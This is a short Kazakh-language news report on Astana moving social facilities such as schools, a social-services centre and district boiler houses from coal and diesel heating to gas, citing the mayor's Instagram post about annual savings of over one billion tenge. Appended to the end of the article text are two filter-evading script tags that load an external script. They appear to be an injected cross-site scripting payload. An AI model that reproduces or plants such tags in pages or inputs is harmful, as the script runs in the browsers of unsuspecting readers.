1 млрд теңгеден астам үнемдеу: Астанадағы әлеуметтік нысандар газға көшірілді Бұл туралы қала әкімі Алтай Көлгінов өзінің Instagram парақшасында жазды. Әлеуметтік нысандарды газға қосудамыз. Елорданың елді мекендерінде автономды жылу көздері арқылы жылытылған әлеуметтік нысандар бар. Олар автономды жылу көздері арқылы, яғни, көмір немесе бірнеше есе қымбат дизель отыны арқылы жылытылды. 20 әлеуметтік нысанның (Алматы және Сарыарқа ауданы) 13 нысаны газға ауыстырылды, қалған 7 нысан бойынша іске қосу-жөндеу жұмыстары жүргізілуде. Олардың қатарында елді мекендердегі бірқатар көпқабатты тұрғын үйлерді жылытқан 3 аудандық жылу қазандығы да бар. Бұл объектілерді газға ауыстыру есебінен жалпы үнемдеу жылына 1 млрд теңгеден асады. Мысалы, бұрын №40 мектеп дизельдік отынмен жылытуға жылына 160 миллион теңгеге жуық қаржы жұмсаса, газбен бұл сома шамамен 4 есеге азайды. Ал, «Шарапат» әлеуметтік қызмет көрсету орталығының үнемдеуі жылына 60 миллион теңгеден асады. Үйлерін газға ауыстырған Көктал-1 ауданының тұрғындарымен кездестім. Тұрғындар көмір сатып алудың, күлді тазалаудың, күні бойы үйде отынды қадағалаудың қажеті жоқ екендігін, сондай-ақ, газдандыру экологиялық таза және қауіпсіз екенін атап өтті, - деп жазды шаһар басшысы.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>